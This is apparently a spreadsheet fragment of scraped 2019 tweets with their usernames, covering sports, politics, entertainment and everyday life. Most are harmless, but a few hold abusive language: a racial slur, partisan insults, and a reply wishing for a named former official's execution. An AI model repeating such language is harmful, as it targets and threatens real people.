    <t>@BrettCyrgalis Skjei picking up right where he left off- sucking!</t>
  </si>
  <si>
    <t>calm_monkey</t>
  </si>
  <si>
    <t>@HatsforPeace @TheNatidude I would guess Boras and some players are okay with some deferred money pumping up the reported contract value.</t>
  </si>
  <si>
    <t>CheriJacobus</t>
  </si>
  <si>
    <t>@patpattduplant1 @LeGateauChoc @ByronYork not a member of the committees holding the closed door hearings.</t>
  </si>
  <si>
    <t>CowShedWV</t>
  </si>
  <si>
    <t>What’s your favorite pizza toppings? Give us a call to have yours delivered. 304-732-7000. #foxspizza #cowshedwv #pizza #westvirginia #wv #southernwv #pinevillewv #bigdaddy #yum https://t.co/qOavXIZaHY</t>
  </si>
  <si>
    <t>leticiadalpont</t>
  </si>
  <si>
    <t>Anyone is selling tickets for Taylor Swift Lover East? I need 2 or 3. Please help me #loverfesteast</t>
  </si>
  <si>
    <t>theintercept</t>
  </si>
  <si>
    <t>Undocumented workers have kept chicken factories in Mississippi operating for decades. In August, ICE raids resulted in the arrests of hundreds across the state, leaving a community struggling to recover. https://t.co/X2ssEMQcMS Published in partnership with @UniNoticias.</t>
  </si>
  <si>
    <t>222_oya</t>
  </si>
  <si>
    <t>@HidDinThought28 indeed. We must use discernment when it comes to using our divine gifts.</t>
  </si>
  <si>
    <t>Samantha_Joyyy</t>
  </si>
  <si>
    <t>You might develop a growing awareness that you are playing a n... More for Gemini https://t.co/p3CKalvZ8c</t>
  </si>
  <si>
    <t>imyourauntienow</t>
  </si>
  <si>
    <t>@SwervvoG Oh hunty we're in the 60s here 🥴</t>
  </si>
  <si>
    <t>HomelissMac</t>
  </si>
  <si>
    <t>@virginmedia Is this free to air on virgin?</t>
  </si>
  <si>
    <t>NiiHendrix</t>
  </si>
  <si>
    <t>Niggas owe up</t>
  </si>
  <si>
    <t>SullyWins</t>
  </si>
  <si>
    <t>@Dansgaming The book, Doctor Sleep, was only okay. I enjoyed it enough. Hopefully the movie is better.</t>
  </si>
  <si>
    <t>EsquiresNYC</t>
  </si>
  <si>
    <t>Make you're looking sharp for this weekend! There's nothing better than having confidence when going out with friends. https://t.co/KsG481MJ2w</t>
  </si>
  <si>
    <t>zackmonday</t>
  </si>
  <si>
    <t>God damn this @DirtyDickinson hot tag is great. Running wild on The Butcher &amp; The Blade! #UnchartedTerritory #Pazuzu Dickinson gives @hail_sanchez a Burning Hammer into a Double Stomp on @BraxtonSutter that ruled</t>
  </si>
  <si>
    <t>LiveWellBBW7</t>
  </si>
  <si>
    <t>Working long hours to come home to a family who needs you love, care &amp; attention is one of the hardest things on this Earth. We constantly give our energy, attention, time and selves to our families and occupations.… https://t.co/qmjqaw0Mrd</t>
  </si>
  <si>
    <t>iamgreenwise</t>
  </si>
  <si>
    <t>@VVFriedman @realDonaldTrump @LouisVuitton @realDonaldTrump you're an idiot and a coward. #TrumpBetrayedOurAllies #BackStabberInChief #TheArtOfTheFAIL https://t.co/QU74LMU2bX</t>
  </si>
  <si>
    <t>VNessa94</t>
  </si>
  <si>
    <t>I'm still high from @BlackGirlFest yesterday. Last week I was struggling to write an article and wondering whether I should give up my passions. Today I finished the it, started a blog, and came up with a game plan to manage everything. Being surrounded by BW is so therapeutic.</t>
  </si>
  <si>
    <t>k_a_aitch</t>
  </si>
  <si>
    <t>@laureneoneal Just finished my first editing job for a new publishing co. ;-) So Tuesday is the new Saturday for me.</t>
  </si>
  <si>
    <t>bunch_nuts</t>
  </si>
  <si>
    <t>@bstein1963 My top ten: 1: OSU (based on the eye test) 2: Alabama 3: LSU 4: Clemson (still keeping them in the top four but dropping them to the last spot based on play) 5: Oklahoma 6: Georgia (think they’re overrated and struggled against Tennessee early)</t>
  </si>
  <si>
    <t>KSEMusic</t>
  </si>
  <si>
    <t>4th grade playing Hot Cross Buns for the first time! #recorderkarate @MusicK8Magazine @CobbPerforms @ARTwithJessica @KSpringsLions https://t.co/DjtxI5cGfd</t>
  </si>
  <si>
    <t>Shanyousaf6</t>
  </si>
  <si>
    <t>@KashifMD Now wait for all those Indians who usually jump on your tweets targeting Pakistan's treatment of minorities, to get offended by this by saying there is no such a thing like this in India. Sunni supremacy and Hindu supremacy are two sides of the same coin.</t>
  </si>
  <si>
    <t>stand4knowledge</t>
  </si>
  <si>
    <t>Brought to you by Plex,Sonarr, and PlexPy ({Big-D}) Bluff City Law - You Don't Need A Weatherman... was recently added to Plex. #plexOut https://t.co/Zu3sG6kbxm</t>
  </si>
  <si>
    <t>StephMfnGotti</t>
  </si>
  <si>
    <t>i know who REALLY getting money an who jus doing this shit for play. so at the end of the day don’t let this twitter shit fool y’all. 🤡🤡🤡</t>
  </si>
  <si>
    <t>OldSkoolDaze</t>
  </si>
  <si>
    <t>Was gonna drop $500 on a new guitar in the coming months, but found something better for $80 Thanks Hallowen</t>
  </si>
  <si>
    <t>nopaolita_</t>
  </si>
  <si>
    <t>You ever see some crazy shit and wonder “what crazy shit would Ice T in an SVU episode say?”</t>
  </si>
  <si>
    <t>ChrisOBXnc</t>
  </si>
  <si>
    <t>@55true4u She knows she doesn't have a leg to stand on.</t>
  </si>
  <si>
    <t>VinylRecordDeal</t>
  </si>
  <si>
    <t>Just saw this on Amazon: In Japan by The Jackson 5 for $26.98 https://t.co/nOCYYn1Ykd via @amazon</t>
  </si>
  <si>
    <t>98_bmoney</t>
  </si>
  <si>
    <t>Doing a midterm at edge while goth girls heckle you&gt;&gt;&gt;&gt;Going to the library</t>
  </si>
  <si>
    <t>redslice</t>
  </si>
  <si>
    <t>@dshiao Wow, Dennis, thanks for the video! I can't wait to discuss how we can infuse our marketing (and life) with more #empathy.</t>
  </si>
  <si>
    <t>jake_rish</t>
  </si>
  <si>
    <t>@becokaronte @BotPrais Chansey can appear on almost every route and when your shiny hunting they appear SO much more then normally.. SO i have a few and have let like 4 run away because its not worth ruining my shiny odds</t>
  </si>
  <si>
    <t>JennaCipolla</t>
  </si>
  <si>
    <t>Watched @hiitaylorlynn’s video of her bathing her cats for the first time lastnight when I was drunk and I never laughed so hard 😂❤️ almost choked on my Chinese food.</t>
  </si>
  <si>
    <t>discreetbro704</t>
  </si>
  <si>
    <t>@EstebanKortez He gotta a buddy? Lol I'll make a trip up there</t>
  </si>
  <si>
    <t>hum_drums</t>
  </si>
  <si>
    <t>@edboal @computersandlaw Thanks for your excellent live tweeting. It sounded like an excellent event. I'm sorry I couldn't be there.</t>
  </si>
  <si>
    <t>LCardonald</t>
  </si>
  <si>
    <t>Aware that lots more than the 45 travelling to Assisi and Rome tomorrow morning would like to be joining us, our full itinerary is on the parish website. We'll update each day on this page and our Facebook page so that nobody misses out. https://t.co/A9vJSqPbzo</t>
  </si>
  <si>
    <t>chloewarburton_</t>
  </si>
  <si>
    <t>The week after being away is always guaranteed to be the worst week of ya life doesn’t matter where you’ve been or how long for. My plot needs finding and fast</t>
  </si>
  <si>
    <t>IAmTheRealLilD</t>
  </si>
  <si>
    <t>Who’s Ready For Season 11., 2019 SHP Entertainment, Inc. LTD a division of Universal Music Group Distribution &amp; Hood And Associate Records https://t.co/qlQU2qwxaO</t>
  </si>
  <si>
    <t>djwilsyy</t>
  </si>
  <si>
    <t>@tropicalTW_ trust me, no ones happier to hear this than me</t>
  </si>
  <si>
    <t>lilibiki</t>
  </si>
  <si>
    <t>@yurifucker YA COME SAY HI I MISS YOU we can’t smoke bc college but we can vape/edible and show the dog symphogear</t>
  </si>
  <si>
    <t>JonesyChris</t>
  </si>
  <si>
    <t>Hey @ArubaNetworks why do you use white background with white text boxes in Central? Maybe I'm the only one that uses it so no one has complained but this is terrible... https://t.co/dehMIX9DIv</t>
  </si>
  <si>
    <t>CatherineDatui4</t>
  </si>
  <si>
    <t>On deck posted up 💰 | #REALTOR® #UberLasVegas🎲 https://t.co/cyHO0PX8XR</t>
  </si>
  <si>
    <t>HourlyStruggle</t>
  </si>
  <si>
    <t>@tangle_some Zoom and Enhance. Yeeeaaahhhhh!</t>
  </si>
  <si>
    <t>feverheart_</t>
  </si>
  <si>
    <t>@ageofaliyah you’re really good at makeup and you’re so nice!!</t>
  </si>
  <si>
    <t>Marleibuonomo</t>
  </si>
  <si>
    <t>Julia and the full moon https://t.co/jLDPLWb7AS</t>
  </si>
  <si>
    <t>PanthersCulture</t>
  </si>
  <si>
    <t>@Tr1ppMorgan Two horribly bad hands to the face calls (they didn’t happen) that extended drives and led to scores to win the game for Green Bay.</t>
  </si>
  <si>
    <t>marymaskew</t>
  </si>
  <si>
    <t>@SeattleWonk We have to stop this discussion now: it is causing you entirely too much pain.</t>
  </si>
  <si>
    <t>amrammel</t>
  </si>
  <si>
    <t>@rise.bellefontaine for the win. https://t.co/76JrWka8rQ https://t.co/pW8cTyh2zg</t>
  </si>
  <si>
    <t>a1cell4u</t>
  </si>
  <si>
    <t>Chicago PD: Cancelled or Renewed for Season Eight on NBC? https://t.co/o0oH1dJw9J https://t.co/XxDqCHzuOh</t>
  </si>
  <si>
    <t>MclarenDante</t>
  </si>
  <si>
    <t>@rumirubber2 Time to make a mess? I'm ready to clean</t>
  </si>
  <si>
    <t>jonathon_tyler2</t>
  </si>
  <si>
    <t>@loganbloomie @tomselliott I love CNN bro and I love people like this. Can’t get enough of this content. 10/10</t>
  </si>
  <si>
    <t>LisaHer66835841</t>
  </si>
  <si>
    <t>Check out what I just added to my closet on Poshmark: Soft Surroundings || New Gold Sequins Turtleneck. https://t.co/ErP2YK8BwN via @poshmarkapp #shopmycloset</t>
  </si>
  <si>
    <t>JasonVasa</t>
  </si>
  <si>
    <t>So really, @NFL , where exactly are you allowed to hit a QB? This is fucking ridiculous.</t>
  </si>
  <si>
    <t>LauraSa07262575</t>
  </si>
  <si>
    <t>@marcorubio Has Twitter become your confessional box. You should ask Raul Castro to absolve you of your transgressions. How’s about 30 years in. Cuban prison for your hypocrisy.</t>
  </si>
  <si>
    <t>musicfitters</t>
  </si>
  <si>
    <t>♫ I Don't Want to Live Without You (7" Mix) by Foreigner</t>
  </si>
  <si>
    <t>MagnatronGaming</t>
  </si>
  <si>
    <t>@dasweetdude @Mikpwn He said the best though. Anything from Pepperonis is low tier and only good after a night at the clubs</t>
  </si>
  <si>
    <t>HyltonBulldogs</t>
  </si>
  <si>
    <t>Mrs. Eason and Ms. Testerman's Fashion Marketing Students are having a friendly competition and are asking students to vote. Come by 5th Street to vote on your favorite October Fashion Display. https://t.co/EqrgA5vIIK</t>
  </si>
  <si>
    <t>BrendanLeister</t>
  </si>
  <si>
    <t>@FtblSickness @KP_Show It was more like last season from this standpoint. &amp; allowed Mayfield to gain ground to see &amp; throw rather than being forced up inside.</t>
  </si>
  <si>
    <t>HwnElectric</t>
  </si>
  <si>
    <t>710p Kaneohe update: Crews are currently onsite working to safely restore power. Outage due to tree and lines down near Pali Golf Course entrance. Estimated restore time: 810p. Mahalo for your patience. #OahuOutage</t>
  </si>
  <si>
    <t>GeneralStrikeUS</t>
  </si>
  <si>
    <t>How the cops are tracking you https://t.co/mpP7QySy5O</t>
  </si>
  <si>
    <t>Don_Melly</t>
  </si>
  <si>
    <t>@lefraud_exposed @GXATSHXT @Brandon32349201 I see you used a lot of repetitive troll logic...Bron has 3 finals MVPs 4MVPs and 3 Rings..Ranking the great is how well you maximized your individual success as well as team success while factoring in their circumstances and expectations</t>
  </si>
  <si>
    <t>IsabelleBlanco_</t>
  </si>
  <si>
    <t>@angelique_v1 The real question is what’s the move? 😗</t>
  </si>
  <si>
    <t>DanFoxJournal</t>
  </si>
  <si>
    <t>Community members held an impromptu street dance at the corner of Cherry Street and Main in Downtown Troy Friday, Oct. 11, to raise awareness for an upcoming candlelight vigil for Domestic Violence Awareness Month, which will be held this Friday, Oc… https://t.co/h0VJ2wd3l5</t>
  </si>
  <si>
    <t>Odylique</t>
  </si>
  <si>
    <t>Pregnancy and Essential Oils - Is There A Risk? #pregnancy #essentialoil https://t.co/OzBrLXt08N https://t.co/bYIBIebab3</t>
  </si>
  <si>
    <t>roseofexorcism</t>
  </si>
  <si>
    <t>OH FUCK. I FINALLY HAVE SERVANTS THAT CAN FARM LANCER ASSASSIN EMBERS EASILY INSTEAD OF HAVING TO USE FUCKING SALIERI</t>
  </si>
  <si>
    <t>dkrwilliams</t>
  </si>
  <si>
    <t>@prayingmedic What a total fruitcake!! Took him this long to figure out the absolute obvious? I am now thinking there is NO whistle-blower. This will come out &amp; he will have to step down @ the minimum. He needs to be indicted if this is the case.</t>
  </si>
  <si>
    <t>CJ91legend</t>
  </si>
  <si>
    <t>@shad_rah Instead of trying to help or guide the younger gays, choose to prey on them</t>
  </si>
  <si>
    <t>butterwurth</t>
  </si>
  <si>
    <t>my body may be very “ill-proportioned” and “emaciated” but at least my meat is “huge”</t>
  </si>
  <si>
    <t>shrill_falsetto</t>
  </si>
  <si>
    <t>Trump says the US has three options over Turkey's military offensive against Kurds in Syria https://t.co/SMS6qX8HFG</t>
  </si>
  <si>
    <t>Dignan1</t>
  </si>
  <si>
    <t>7-4 Nats @KevinMKruse. Cards are finally starting to come alive.</t>
  </si>
  <si>
    <t>gina_scooter</t>
  </si>
  <si>
    <t>@BeeBabs That’s how it read to me too</t>
  </si>
  <si>
    <t>Castrid</t>
  </si>
  <si>
    <t>I had pho for lunch today and I’m so full I wanna take a nap so bad</t>
  </si>
  <si>
    <t>speed_skater</t>
  </si>
  <si>
    <t>Body language speaks volumes. I somewhat have a love / hate relationship with that as I’ve studied &amp; read about it for 8+ years. I listen to people’s bodies more than the words they speak. Can be so good or so detrimental. You can read about it here: https://t.co/9eoP5308di</t>
  </si>
  <si>
    <t>mypetneedsthat</t>
  </si>
  <si>
    <t>The Best Nail Caps for Cats (Review) in 2019 &gt;&gt; https://t.co/BnpDQaX4VS</t>
  </si>
  <si>
    <t>ZayalaAshira</t>
  </si>
  <si>
    <t>She started off as an RP character as well but the people I used to RP with don't seem to RP anymore. She has a temper when it comes to meeting new people. While shes not outright aggressive, she will give the cold shoulder until she feels she can trust them. Being</t>
  </si>
  <si>
    <t>Raven_T_au</t>
  </si>
  <si>
    <t>@50cent Prolly seen his dad do it to mummy on the couch ...</t>
  </si>
  <si>
    <t>ChrisAmodioShow</t>
  </si>
  <si>
    <t>Bobby Lashley was wearing his gear on the limo ride to the arena? I’m confused here. https://t.co/PPIOE7U4kp</t>
  </si>
  <si>
    <t>nee_haynes</t>
  </si>
  <si>
    <t>@realDonaldTrump There is no defense for what you have done.</t>
  </si>
  <si>
    <t>wookietim</t>
  </si>
  <si>
    <t>@robyn_stovall @ldog562 @MCaffrey_ACC @BarryVictor5 @DelizDear @doug_in_nc @trom771 @poppij @TilghmanChris @Ldogls @PatriciaMillin @BlueTsuni @IvyTwoPointOh @rbcb199 @BLhasdogs @Gratzy12 @chbrkr @MairScott3 @openpodbaydoor_ @BillReagan16 @AnonSnark @BandieraNancy @mick719 @tjbogart33 @AlimonteLina @justkiddingjeez @aconcernedvote @zazzybritches @heatherrnlmt @JustinCCooper1 @HondoResists @EveScottGarner @PAULUSV3 @GreenspanArnold @porto1958 @kristyshl @Cha51brolll19 @Spyglass1999 @SherriBallinger @KLinduff @KetchumMick @pecriel @patriciaself @SassyMsViolet @Bettie003 @keanothedog @GonzoBaggins @MarenHofstad @MGilpatrick @CuriousGreg Here's the thing - Collins is a weasel that ought to be voted out, we agree. I am saying watch her because she NEEDS McConnell's support in her campaign this year. If she votes to remove then McConnell is telling her to. And if he is, he's telling others to as well.</t>
  </si>
  <si>
    <t>DubPHX</t>
  </si>
  <si>
    <t>@MattBarr_ Maybe they should try to extend him now in season?</t>
  </si>
  <si>
    <t>ParentChallenge</t>
  </si>
  <si>
    <t>@venividivicki63 @zenjen53 @nicgrosjean @ChatByCC @LindseyGrahamSC @realDonaldTrump Due process will take effect when the work of these committees are done and charges are presented by the entire Congress against the Treasonous Criminal in the White House. Once he is indicted, he can have all the due process he wants when the Senate tries him.</t>
  </si>
  <si>
    <t>KeepSwishiin</t>
  </si>
  <si>
    <t>You’re inclined to make passionate declarations about what’s n... More for Scorpio https://t.co/osjPfAu9SB</t>
  </si>
  <si>
    <t>nikkitruong_</t>
  </si>
  <si>
    <t>@Solein4x you not even old enough to drink</t>
  </si>
  <si>
    <t>Memorabilia1st</t>
  </si>
  <si>
    <t>Over 100 tickets sold already for An Evening with @TonyBellew 🔥 To grab yours head across to https://t.co/RUs6tgM9Qq We're supporting the fantastic @VICSunderland at this one!! #charity #Veterans #events #sunderland https://t.co/KEhWaahrWr</t>
  </si>
  <si>
    <t>ACM_president</t>
  </si>
  <si>
    <t>Good read about use of #facialRecognition in #airports. It’s one thing to knowingly consent to having my #biometrics stored by my govt (e.g., Global Entry program). But I’m disturbed that #airlines feel free use my data w/o my knowledge or consent.#privacy https://t.co/joou1MAMkY</t>
  </si>
  <si>
    <t>SurvivalistMP</t>
  </si>
  <si>
    <t>The latest https://t.co/7MiIzZaZlU! https://t.co/ALFJTk9edL</t>
  </si>
  <si>
    <t>vanessatguzman</t>
  </si>
  <si>
    <t>Follow for follow? My instagram is vanessaguzman2828 need more Ig friends! 😁</t>
  </si>
  <si>
    <t>Ironfis08148813</t>
  </si>
  <si>
    <t>@JohnBrennan @TrishG40124623 @realDonaldTrump We hope they will be televised and your execution too. https://t.co/ZXneaXfNmM</t>
  </si>
  <si>
    <t>dirtydarii</t>
  </si>
  <si>
    <t>@foureyedyogi I’m here for your entertainment https://t.co/5OptZwbzVs</t>
  </si>
  <si>
    <t>StateStatus_NM</t>
  </si>
  <si>
    <t>NM moms to testify at methane hearing - Albuquerque Journal https://t.co/R16iVca1PR</t>
  </si>
  <si>
    <t>Arquettemtg</t>
  </si>
  <si>
    <t>@BrianDeMars1 @TolarianCollege Hey I'm also planning on going wondering if you wanted to car pool</t>
  </si>
  <si>
    <t>kastlekl</t>
  </si>
  <si>
    <t>@ShelleyElwood Yes, they seemed proud of their work-around. Lots of dry shampoos and wet-wipes, some sink bathing and occasional hair washing. I’m just not sure if this is deepening depression that needs treating, or what?</t>
  </si>
  <si>
    <t>nancystaack</t>
  </si>
  <si>
    <t>@KorzyBeams @youknowthevibes Due to other influences, much like Al Gore &amp; Florida. We have a host of problems/interference by GOP; so it's more than just the electoral vote. We won the midterms which proves when Dems vote, we win. 1/</t>
  </si>
  <si>
    <t>stovies5</t>
  </si>
  <si>
    <t>@Channel4News The union is finished. We won't stop till Scotland is independent and as far away from the corrupt Tories as possible.</t>
  </si>
  <si>
    <t>ChefsUnDiet</t>
  </si>
  <si>
    <t>How Data Savvy Brands Get to Know Their Customers to Gain Their Loyalty https://t.co/tvzGIrZx2t</t>
  </si>
  <si>
    <t>bigback1911</t>
  </si>
  <si>
    <t>Happy Birthday Tyler!! Keep God first and stay humble son. Love you for the young man you have become. https://t.co/TZN3oodzS5</t>
  </si>
  <si>
    <t>lolgoodmeme</t>
  </si>
  <si>
    <t>I just want a spooky girl to tear my neck open w/ some fangs is that too hard to ask 😔</t>
  </si>
  <si>
    <t>sylvyei</t>
  </si>
  <si>
    <t>i am emotionally attached to this bastard #thewitchandthehundredknight #witch100 #metallia https://t.co/O2ONeBG9rv</t>
  </si>
  <si>
    <t>SiobhanSings</t>
  </si>
  <si>
    <t>@Tanvsnat ...from the bedside table like a normal fucking person. I’m gonna surround him in dumbbells next summer and see how happy he wakes up 😂</t>
  </si>
  <si>
    <t>NewHopeTravel1</t>
  </si>
  <si>
    <t>Love these prehistoric looking creatures, bit of a nuisance in Florida at the moment. #travelagentlife #wifiwage #residualincome https://t.co/h3WpYdYXzl</t>
  </si>
  <si>
    <t>melbournedynamo</t>
  </si>
  <si>
    <t>Our ressies fail to break down a hard working @DerbyAthleticFC side, the game finishes 0-0. Very negative tactics from the away side but a point well deserved all the same 👍 🔵⚪️🔵⚪️🔵⚪️🔵⚪️🔵⚪️🔵⚪️</t>
  </si>
  <si>
    <t>JimOstrowski</t>
  </si>
  <si>
    <t>#DNCNBC is cheering another Star Chamber proceeding to get Trump today.</t>
  </si>
  <si>
    <t>corkyd</t>
  </si>
  <si>
    <t>Microsoft Office Home and Business 2010 Authentic Be quick $44.99 #homeoffice #businessoffice #businesshome https://t.co/nN6zEv3p3c https://t.co/5ENYSjPnZS</t>
  </si>
  <si>
    <t>Legalizeshroom1</t>
  </si>
  <si>
    <t>@1Fuxi @anearthlife @HillaryClinton Any politician can say the same about themselves, especially Barrack Obama, I voted for him when I was still brain dead.</t>
  </si>
  <si>
    <t>lizzirizzobls</t>
  </si>
  <si>
    <t>@Roclogic Keep talking... as much, and, as often as you need to, Roc. We're listening. ✌🏽💜</t>
  </si>
  <si>
    <t>The_Cle_Kid</t>
  </si>
  <si>
    <t>@ESPNBooger Do you get paid by the word?</t>
  </si>
  <si>
    <t>suaavecitabb</t>
  </si>
  <si>
    <t>My friends wanna be play boy bunnies and they want me to b a sexy Hefner lmfao bitch I ain’t sexy</t>
  </si>
  <si>
    <t>kimbrrlyclaire</t>
  </si>
  <si>
    <t>@DrJenGunter there's a House episode I'm watching where he treats a pregnant woman, and every time someone says "baby" he loudly says "FETUS!"</t>
  </si>
  <si>
    <t>AbrahamsonBrent</t>
  </si>
  <si>
    <t>@EskoSchools Decals for the football teams jerseys.</t>
  </si>
  <si>
    <t>Cubsfan3410</t>
  </si>
  <si>
    <t>So excited to start this after work @nmlund https://t.co/3Y1CTTg4Bd</t>
  </si>
  <si>
    <t>Dmakes2</t>
  </si>
  <si>
    <t>@LockyLockerson I grabbed Memphis long ago at 45/1 so I may be biased here but I think they are more talented than any other mid Major and it isn’t close. Also, Tillie can’t stay healthy for Zags and that’s a big issue</t>
  </si>
  <si>
    <t>Matsikoudiscom</t>
  </si>
  <si>
    <t>@RNicholasBurns @HellenicLeaders They can and must create a mechanism and every American plan and bomb should leave incilirk</t>
  </si>
  <si>
    <t>G_Khoury</t>
  </si>
  <si>
    <t>Are you joining us for .Conf19? Whether you're a .conf first-timer or a 10-year pro, we've got a handful of insider tips and tricks that are guaranteed to help you make the most of your week in Las Vegas. Take a look. #splunk https://t.co/hnQjkVGSIO</t>
  </si>
  <si>
    <t>Tactical_review</t>
  </si>
  <si>
    <t>@AaronClapp3 @67donnalynn @hick101hop OK, so she was provided a lot of information. The question now is, will she learn from it, or ignore it and remain willfully ignorant. In this time of easy to access information, ignorance is a choice.</t>
  </si>
  <si>
    <t>EPatz_</t>
  </si>
  <si>
    <t>I need new wigs but i’m too poor for decent ones 😫</t>
  </si>
  <si>
    <t>PaulKingTips</t>
  </si>
  <si>
    <t>Does Stradivarius do the business today? 👀</t>
  </si>
  <si>
    <t>123MissyMegan</t>
  </si>
  <si>
    <t>@Silk__831 @Jessicaholback I could start walking places 🙃 compared to others states I’ve considered it’s definitely the most gorgeous &amp; best food.</t>
  </si>
  <si>
    <t>BethanMay</t>
  </si>
  <si>
    <t>@Dutiful_Murdock @MikeEverestEvs @HalfStrungHarp @TLGreylock @AnnaSmithWrites @nilsreviewsit @IShouldReadThat I... Er.... Yes? (I don't know why I'm checking the rules for Settlers, they're not going to be useful in this instance) https://t.co/XXNY376qSh</t>
  </si>
  <si>
    <t>mike57588926</t>
  </si>
  <si>
    <t>@PittsburghSport We must have one of the worst 3rd down defenses.</t>
  </si>
  <si>
    <t>mlairwlwt</t>
  </si>
  <si>
    <t>@BearcatEd_30 I see UK wanted to honor a beloved alum gone too soon.</t>
  </si>
  <si>
    <t>kyleighcool13</t>
  </si>
  <si>
    <t>@D_LUCOUS @xtina THANK YOU SO SO MUCH FOR SHARING !! 💓💓💓 I LOVE YOU ! It was so so so amazing meeting you and getting to know you some more !</t>
  </si>
  <si>
    <t>WarriorFightWea</t>
  </si>
  <si>
    <t>Warrior Fight Wear 10oz Leather Boxing Gloves - Lace up Professional Fight Gloves https://t.co/5BIbDWfbKl https://t.co/5BIbDWfbKl https://t.co/I6DJUQXGTk</t>
  </si>
  <si>
    <t>SueBB_71</t>
  </si>
  <si>
    <t>@theJeremyVine @ExtinctionR They drove an untaxed diesel engine to a government building, wasted thousands of litres of water and hold up a giant plastic banner.....🤔 I marched for CND, Anti blood sports, anti vivisection &amp; many others, changes were made despite the lack of social media &amp; stupid antics..</t>
  </si>
  <si>
    <t>Steve50945209</t>
  </si>
  <si>
    <t>@AuntMingy @BadAsVlad @realDonaldTrump Stop voting the dead and illegals, cheating dems.</t>
  </si>
  <si>
    <t>DeannaDeanna061</t>
  </si>
  <si>
    <t>@1bigbeer If Drs know a person really needs it then that’s fine, but I know someone that gets medical marijuana and has no health problems.</t>
  </si>
  <si>
    <t>kirst24601</t>
  </si>
  <si>
    <t>Now the power grid problem seems to be fixed, lazy evening cozy on sofa with Netflix it is 😌</t>
  </si>
  <si>
    <t>ThePeddler66</t>
  </si>
  <si>
    <t>@BeckyLynchWWE @wwe She is Hyped to see the man #HIAC https://t.co/FJ4iwk3vuY</t>
  </si>
  <si>
    <t>ReneB74556241</t>
  </si>
  <si>
    <t>@Dodgers Can you pull Seager from the game move everybody around to accommodate Freeze</t>
  </si>
  <si>
    <t>AMoore434</t>
  </si>
  <si>
    <t>Whole world is falling to pieces, I sit back and observe and breathe. My cat gets outside and I flip shit, hearing my heart through my chest.</t>
  </si>
  <si>
    <t>J_GonzZO</t>
  </si>
  <si>
    <t>Scandrick strip sack for a TD 😈😈😈 #FlyEaglesFly and the four other starters are hurt 😩 idgaf the eagles still need to trade for a corner</t>
  </si>
  <si>
    <t>PersonalGenius</t>
  </si>
  <si>
    <t>NGL, I audibly gasped no fewer than 10 times (I think half of them were at Shiv because, WTF), and stood up and cheered exactly once.</t>
  </si>
  <si>
    <t>Sp00ky_Spicee</t>
  </si>
  <si>
    <t>I am sitting at the hospital because of my son and man situations like these, when my kids dad is just MIA, helps sink in to me that I’m really alone in this shit. And it sucks🙂</t>
  </si>
  <si>
    <t>ConfirmedShoot</t>
  </si>
  <si>
    <t>@jake_nazar There’s a scenario where Punk and Booker end up having incredible chemistry and it ends up being a tremendous hour of tv. I hope it happens.</t>
  </si>
  <si>
    <t>JustPeople77</t>
  </si>
  <si>
    <t>@thatmummarocks 😕 if by chance it has to do with the server, the two occasions that I have tried, it's giving me hell. That green tank armor you have is dope 👌💚</t>
  </si>
  <si>
    <t>mrmiriani</t>
  </si>
  <si>
    <t>Good luck to the Cavalier softball team! They take on the Fulton Hornets this afternoon at Southern Boone High School. First pitch is set for 4 PM. @cccavs_softball @CCHSCavs #GoCavsGo https://t.co/X3DoCPJj55</t>
  </si>
  <si>
    <t>__gracelynn__</t>
  </si>
  <si>
    <t>I dropped my Harold’s on the floooorrr😩😭🥺</t>
  </si>
  <si>
    <t>AeronPeets3</t>
  </si>
  <si>
    <t>Here goes nothing Let’s Go Yankees Game 1 of the ALDS is underway tied right now let’s go ⚾️🥇🥇🏆🤤</t>
  </si>
  <si>
    <t>BarryDrudge</t>
  </si>
  <si>
    <t>@RobynHitchcock @emmaswiftsings @CafeBerlinMad I like riding backwards. My wife noted in Italy that we had more of a chance to continue to see something of interest, facing forward means it’s by in a flash...especially on the fast train! #rockinRobyn</t>
  </si>
  <si>
    <t>LichtenStrange_</t>
  </si>
  <si>
    <t>@sophkat7 Not so much motivation it's more literally being out of the country and Christmas retail IM ASSUMING THATS THE WORKING TIME FOR THIS IDK???</t>
  </si>
  <si>
    <t>shakizaru</t>
  </si>
  <si>
    <t>@notreallytoxic @Will5teve @HYPEX I hit level 75 and I didn’t play the game for 5 and a half weeks</t>
  </si>
  <si>
    <t>hempstead_susan</t>
  </si>
  <si>
    <t>NCIS IF FAMILY TO ALL OF US WATCHING. #NCIS</t>
  </si>
  <si>
    <t>silverf22330551</t>
  </si>
  <si>
    <t>@GovBrewer @SpeakerPelosi @POTUS @realDonaldTrump @BarackObama @alexdschiller THREAD: To punish China we've taxed ourselves and bankrupted our farms. To make us wealthier, we've cut food stamps and health care for the poorest among us. To make us safer we've abandoned our allies, released hundreds of terrorists, and bombed our own bases.</t>
  </si>
  <si>
    <t>dellaturner71_a</t>
  </si>
  <si>
    <t>So good I had to share! Check out all the items I'm loving on @Poshmarkapp from @BuyForLessHere1 #poshmark #fashion #style #shopmycloset #instylewetrustnyvintageclassic #sperry #tommyhilfiger: https://t.co/CZ6haajWuJ https://t.co/que38TjQt7</t>
  </si>
  <si>
    <t>tyraxs_</t>
  </si>
  <si>
    <t>Was literally falling asleep on the couch an hour ago now i cant sleep even tho im exhausted</t>
  </si>
  <si>
    <t>PMGVegetation</t>
  </si>
  <si>
    <t>@DerekJSebastian @NRCS_WY @NRCS_MT @NRCSnCO @forestservice @COParksWildlife @NatlParkService Great advice! What do you think are best practices for treating it?</t>
  </si>
  <si>
    <t>twirlynao</t>
  </si>
  <si>
    <t>Thanks @NubianHeritage and @Influenster for letting me try #NHCocoPapDeo #complimentary ! 🥥 https://t.co/opOfgcrJpn</t>
  </si>
  <si>
    <t>NEMOamerican201</t>
  </si>
  <si>
    <t>@AlanBayer2 @USATODAY The Prosecutor was corrupt! The whole world was demanding he be fired Joe was a good guy AMERICANS DON'T LIKE TRAITORS WHOSE SIDE ARE YOU ON?</t>
  </si>
  <si>
    <t>Akrietta</t>
  </si>
  <si>
    <t>Is there a run rule in postseason baseball? Asking for a friend @Braves</t>
  </si>
  <si>
    <t>m13u2</t>
  </si>
  <si>
    <t>@SteveMerkle9 An oldie and a goodie!</t>
  </si>
  <si>
    <t>ImAPhool</t>
  </si>
  <si>
    <t>#apnaghar 5k for a great cause. Great way to start the day</t>
  </si>
  <si>
    <t>foreignliyaah</t>
  </si>
  <si>
    <t>Ik you good inna hood bust a couple jugs for me 🥴</t>
  </si>
  <si>
    <t>Toonces_Resists</t>
  </si>
  <si>
    <t>⚾️⚾️⚾️⚾️⚾️⚾️ Washingtion Nationals are going to the World Series!! https://t.co/kYFtdOv1zE</t>
  </si>
